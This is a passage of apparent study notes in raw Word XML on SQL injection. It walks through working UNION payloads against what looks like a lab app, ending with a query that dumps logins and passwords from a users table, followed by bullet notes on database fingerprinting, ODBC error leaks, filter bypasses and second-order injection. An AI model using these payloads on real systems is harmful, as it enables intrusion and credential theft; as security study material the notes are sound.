        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267F47D7" w14:textId="400F8E3C" w:rsidR="00F831A9" w:rsidRDefault="00F831A9" w:rsidP="00AF3AC1">
      <w:r>
        <w:t xml:space="preserve">Query: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F831A9">
        <w:t>?q=hub' UNION SELECT null</w:t>
      </w:r>
      <w:r>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37705764" w14:textId="451C2846" w:rsidR="00F831A9" w:rsidRDefault="00F831A9" w:rsidP="00AF3AC1">
      <w:r w:rsidRPr="00F831A9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6441E64F" wp14:editId="69C0E516">
            <wp:extent cx="5731510" cy="998220"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="156794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7660" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId64"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="998220"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0268CECD" w14:textId="709D0371" w:rsidR="00323FEC" w:rsidRDefault="00323FEC" w:rsidP="00AF3AC1">
      <w:r>
        <w:t xml:space="preserve">This is an error. So we will modify the query. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78061358" w14:textId="76B55E12" w:rsidR="00323FEC" w:rsidRDefault="00323FEC" w:rsidP="00AF3AC1">
      <w:r>
        <w:t xml:space="preserve">Query: </w:t>
      </w:r>
      <w:r w:rsidRPr="00323FEC">
        <w:t>?q=hub' UNION SELECT null,null--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393E4A4A" w14:textId="77777777" w:rsidR="00323FEC" w:rsidRDefault="00323FEC" w:rsidP="00AF3AC1"/>
    <w:p w14:paraId="2671E475" w14:textId="4F7DCA42" w:rsidR="00323FEC" w:rsidRDefault="00323FEC" w:rsidP="00AF3AC1">
      <w:r w:rsidRPr="00323FEC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27C52703" wp14:editId="499EFC83">
            <wp:extent cx="5731510" cy="1452245"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="37822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26330" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId65"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1452245"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFF4642" w14:textId="7E96EAEE" w:rsidR="00323FEC" w:rsidRDefault="00323FEC" w:rsidP="00AF3AC1">
      <w:r>
        <w:t>Clearly, it worked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77034D23" w14:textId="64FD6828" w:rsidR="009C4F3F" w:rsidRDefault="009C4F3F" w:rsidP="00AF3AC1">
      <w:r w:rsidRPr="009C4F3F">
        <w:t>Step3: (</w:t>
      </w:r>
      <w:r w:rsidR="001D171A">
        <w:t xml:space="preserve">Goal: </w:t>
      </w:r>
      <w:r w:rsidRPr="009C4F3F">
        <w:t>Test string colu</w:t>
      </w:r>
      <w:r>
        <w:t>mn)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAD8829" w14:textId="05F9BB5A" w:rsidR="001D171A" w:rsidRDefault="001D171A" w:rsidP="00AF3AC1">
      <w:r>
        <w:t xml:space="preserve">Query: </w:t>
      </w:r>
      <w:r w:rsidRPr="001D171A">
        <w:t>?q=hub' UNION SELECT 'a',null--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B3A352" w14:textId="392C8CE3" w:rsidR="001D171A" w:rsidRDefault="001D171A" w:rsidP="00AF3AC1">
      <w:r w:rsidRPr="001D171A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D25C384" wp14:editId="298D2CEA">
            <wp:extent cx="5731510" cy="1359535"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="10268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48125" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId66"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1359535"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1CA05D" w14:textId="3164970B" w:rsidR="006C6239" w:rsidRDefault="006C6239" w:rsidP="00AF3AC1">
      <w:r>
        <w:t xml:space="preserve">Step4: (Goal: </w:t>
      </w:r>
      <w:r w:rsidRPr="006C6239">
        <w:t>List tables (SQLite version of sysobjects)</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FACF7BC" w14:textId="7EAECA20" w:rsidR="00387690" w:rsidRDefault="00387690" w:rsidP="00AF3AC1">
      <w:r>
        <w:t xml:space="preserve">Query: </w:t>
      </w:r>
      <w:r w:rsidRPr="00387690">
        <w:t>?q=hub' UNION SELECT name,null FROM sqlite_master WHERE type='table'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793D1D04" w14:textId="13478309" w:rsidR="00387690" w:rsidRDefault="00387690" w:rsidP="00AF3AC1">
      <w:r w:rsidRPr="00387690">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="397AB188" wp14:editId="7877E79C">
            <wp:extent cx="5731510" cy="1012825"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="16112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32938" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId67"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1012825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CE4D2D" w14:textId="1FFA3408" w:rsidR="00387690" w:rsidRDefault="00387690" w:rsidP="00AF3AC1">
      <w:r>
        <w:t xml:space="preserve">Step5: (Goal: </w:t>
      </w:r>
      <w:r w:rsidRPr="00387690">
        <w:t>Dump users table</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D557F43" w14:textId="5CE7D05D" w:rsidR="007D77E3" w:rsidRDefault="007D77E3" w:rsidP="00AF3AC1">
      <w:r>
        <w:t xml:space="preserve">Query: </w:t>
      </w:r>
      <w:r w:rsidRPr="007D77E3">
        <w:t>?q=hub' UNION SELECT login,password FROM users</w:t>
      </w:r>
      <w:r>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4AA522" w14:textId="2EEC5938" w:rsidR="007D77E3" w:rsidRDefault="007D77E3" w:rsidP="00AF3AC1">
      <w:r w:rsidRPr="007D77E3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C27864C" wp14:editId="7252C79B">
            <wp:extent cx="5731510" cy="1524000"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="52844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49013" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId68"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1524000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4074E041" w14:textId="7F8CC8C6" w:rsidR="001D171A" w:rsidRDefault="007D77E3" w:rsidP="00AF3AC1">
      <w:r w:rsidRPr="007D77E3">
        <w:t>Usernames and passwords appear in the product list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3116893D" w14:textId="77777777" w:rsidR="00D6012F" w:rsidRDefault="00D6012F" w:rsidP="00AF3AC1"/>
    <w:p w14:paraId="19109A22" w14:textId="77777777" w:rsidR="00D6012F" w:rsidRDefault="00D6012F" w:rsidP="00AF3AC1"/>
    <w:p w14:paraId="6D51BF39" w14:textId="77777777" w:rsidR="00D6012F" w:rsidRDefault="00D6012F" w:rsidP="00AF3AC1"/>
    <w:p w14:paraId="212C2D61" w14:textId="6DA53087" w:rsidR="00D6012F" w:rsidRPr="00A56427" w:rsidRDefault="00D6012F" w:rsidP="00D6012F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D6012F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Fingerprinting the Database</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF50705" w14:textId="6B4170FB" w:rsidR="004F2BE0" w:rsidRPr="004F2BE0" w:rsidRDefault="004F2BE0" w:rsidP="004F2BE0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="004F2BE0">
        <w:t>Basic SQL injection works across many databases, but advanced attacks depend on the exact database type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061B39A4" w14:textId="534EC6C7" w:rsidR="004F2BE0" w:rsidRPr="004F2BE0" w:rsidRDefault="004F2BE0" w:rsidP="004F2BE0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="004F2BE0">
        <w:t>Attackers identify databases using fingerprinting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7EEE7E" w14:textId="3AB2B1C5" w:rsidR="004F2BE0" w:rsidRPr="004F2BE0" w:rsidRDefault="004F2BE0" w:rsidP="004F2BE0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="004F2BE0">
        <w:t>Fingerprinting methods include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69902E2A" w14:textId="77777777" w:rsidR="004F2BE0" w:rsidRPr="004F2BE0" w:rsidRDefault="004F2BE0" w:rsidP="004F2BE0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="004F2BE0">
        <w:t>Different ways databases join strings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B47EBA8" w14:textId="77777777" w:rsidR="004F2BE0" w:rsidRPr="004F2BE0" w:rsidRDefault="004F2BE0" w:rsidP="004F2BE0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="004F2BE0">
        <w:t>Database-specific numeric functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7128632C" w14:textId="7F784D44" w:rsidR="004F2BE0" w:rsidRPr="004F2BE0" w:rsidRDefault="004F2BE0" w:rsidP="004F2BE0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="004F2BE0">
        <w:t>MS-SQL and Sybase are very similar, so attacks often work on both</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35717257" w14:textId="29FD3CB1" w:rsidR="004F2BE0" w:rsidRPr="004F2BE0" w:rsidRDefault="004F2BE0" w:rsidP="004F2BE0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="004F2BE0">
        <w:t>MySQL has special version-based comments that can be abused to detect the exact database version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621E388E" w14:textId="77777777" w:rsidR="005D6385" w:rsidRDefault="005D6385" w:rsidP="00D6012F"/>
    <w:p w14:paraId="1ACE11A0" w14:textId="74D0E23E" w:rsidR="00D2570F" w:rsidRPr="00A56427" w:rsidRDefault="00997632" w:rsidP="00D2570F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00997632">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Exploiting ODBC Error Messages (MS-SQL Only)</w:t>
      </w:r>
      <w:r w:rsidR="00D2570F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B690BA" w14:textId="1C759E25" w:rsidR="00217563" w:rsidRPr="00217563" w:rsidRDefault="00217563" w:rsidP="00217563">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00217563">
        <w:t>MS-SQL ODBC error messages are extremely verbose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDB0CDB" w14:textId="089C1DA5" w:rsidR="00217563" w:rsidRPr="00217563" w:rsidRDefault="00217563" w:rsidP="00217563">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00217563">
        <w:t>Attackers can exploit these errors to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67890CDE" w14:textId="77777777" w:rsidR="00217563" w:rsidRPr="00217563" w:rsidRDefault="00217563" w:rsidP="00217563">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00217563">
        <w:t>Discover table names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBF7C4A" w14:textId="77777777" w:rsidR="00217563" w:rsidRPr="00217563" w:rsidRDefault="00217563" w:rsidP="00217563">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00217563">
        <w:t>Discover column names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400FDBFA" w14:textId="77777777" w:rsidR="00217563" w:rsidRPr="00217563" w:rsidRDefault="00217563" w:rsidP="00217563">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00217563">
        <w:t>Identify data types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B76EF65" w14:textId="77777777" w:rsidR="00217563" w:rsidRPr="00217563" w:rsidRDefault="00217563" w:rsidP="00217563">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00217563">
        <w:t>Extract sensitive data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCACCE8" w14:textId="7787F7E9" w:rsidR="00217563" w:rsidRPr="00217563" w:rsidRDefault="00217563" w:rsidP="00217563">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00217563">
        <w:t>Type-conversion errors can leak actual database values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B23CA9A" w14:textId="0E6BCF53" w:rsidR="00217563" w:rsidRPr="00217563" w:rsidRDefault="00217563" w:rsidP="00217563">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00217563">
        <w:t>Recursive queries allow attackers to extract entire tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57206C7B" w14:textId="0608C639" w:rsidR="00217563" w:rsidRPr="00217563" w:rsidRDefault="00217563" w:rsidP="00217563">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00217563">
        <w:t>MS-SQL allows multiple SQL statements, enabling data modification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EE9250" w14:textId="025A995B" w:rsidR="00217563" w:rsidRPr="00217563" w:rsidRDefault="00217563" w:rsidP="00217563">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00217563">
        <w:t>Showing detailed database errors to users is a serious security risk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694D774C" w14:textId="77777777" w:rsidR="00217563" w:rsidRDefault="00217563" w:rsidP="00D2570F"/>
    <w:p w14:paraId="77EB6E96" w14:textId="4CDFF856" w:rsidR="00DC2DEA" w:rsidRPr="00A56427" w:rsidRDefault="00DC2DEA" w:rsidP="00DC2DEA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Bypassing Filters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB964B9" w14:textId="06953F0A" w:rsidR="0040374E" w:rsidRPr="0040374E" w:rsidRDefault="0040374E" w:rsidP="0040374E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0040374E">
        <w:t>Input filters are often weak and easy to bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5559DF7A" w14:textId="12F837A1" w:rsidR="0040374E" w:rsidRPr="0040374E" w:rsidRDefault="0040374E" w:rsidP="0040374E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0040374E">
        <w:t>SQL injection does not require specific characters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DF3617" w14:textId="1A955632" w:rsidR="0040374E" w:rsidRPr="0040374E" w:rsidRDefault="0040374E" w:rsidP="0040374E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0040374E">
        <w:t>Blacklists fail due to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552B0A56" w14:textId="77777777" w:rsidR="0040374E" w:rsidRPr="0040374E" w:rsidRDefault="0040374E" w:rsidP="0040374E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0040374E">
        <w:t>Case changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F387A5A" w14:textId="77777777" w:rsidR="0040374E" w:rsidRPr="0040374E" w:rsidRDefault="0040374E" w:rsidP="0040374E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0040374E">
        <w:t>Encoding tricks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BACB39" w14:textId="77777777" w:rsidR="0040374E" w:rsidRPr="0040374E" w:rsidRDefault="0040374E" w:rsidP="0040374E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0040374E">
        <w:t>Comments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1345B6" w14:textId="77777777" w:rsidR="0040374E" w:rsidRPr="0040374E" w:rsidRDefault="0040374E" w:rsidP="0040374E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0040374E">
        <w:t>String construction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17664890" w14:textId="29074EDB" w:rsidR="0040374E" w:rsidRPr="0040374E" w:rsidRDefault="0040374E" w:rsidP="0040374E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0040374E">
        <w:t>Dynamic SQL execution makes filters almost useless</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FA7016" w14:textId="2579A17E" w:rsidR="0040374E" w:rsidRPr="0040374E" w:rsidRDefault="0040374E" w:rsidP="0040374E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0040374E">
        <w:t>Escaping quotes + truncating input is dangerous</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AAE98A" w14:textId="291A7D37" w:rsidR="0040374E" w:rsidRPr="0040374E" w:rsidRDefault="0040374E" w:rsidP="0040374E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0040374E">
        <w:t>Broken filter logic can re-enable SQL injection even when defenses exist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A2089E" w14:textId="77892E9B" w:rsidR="00B5077A" w:rsidRDefault="00F558BB" w:rsidP="00842AEE">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7813C722" w14:textId="567E77BC" w:rsidR="00C01414" w:rsidRPr="00A56427" w:rsidRDefault="00C01414" w:rsidP="00C01414">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00C01414">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>econd-order SQL injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FDF2F6" w14:textId="77777777" w:rsidR="00425F54" w:rsidRPr="00291358" w:rsidRDefault="00425F54" w:rsidP="00425F54">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00291358">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Second-order SQL injection is when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035E8F27" w14:textId="77777777" w:rsidR="00425F54" w:rsidRPr="00425F54" w:rsidRDefault="00425F54" w:rsidP="00425F54">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00425F54">
        <w:t>Bad input from a user is stored safely at first</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA67F17" w14:textId="77777777" w:rsidR="00425F54" w:rsidRPr="00425F54" w:rsidRDefault="00425F54" w:rsidP="00425F54">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00425F54">
        <w:t>But later, the application uses that stored data in another SQL query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576690D6" w14:textId="77777777" w:rsidR="00425F54" w:rsidRPr="00425F54" w:rsidRDefault="00425F54" w:rsidP="00425F54">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00425F54">
        <w:t xml:space="preserve">And </w:t>
      </w:r>
      <w:r w:rsidRPr="00425F54">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>that second use</w:t>
      </w:r>
      <w:r w:rsidRPr="00425F54">
        <w:t xml:space="preserve"> becomes vulnerable to SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CF48C6" w14:textId="55359970" w:rsidR="00425F54" w:rsidRPr="00425F54" w:rsidRDefault="00425F54" w:rsidP="00425F54">
      <w:r w:rsidRPr="00425F54">
        <w:t>So</w:t>
      </w:r>
      <w:r w:rsidR="009F4573">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00425F54">
        <w:t>the attack doesn’t happen immediately. It happens later, when the data is reused.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDAAA4D" w14:textId="2B711BAE" w:rsidR="00291358" w:rsidRPr="00291358" w:rsidRDefault="00291358" w:rsidP="00291358">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
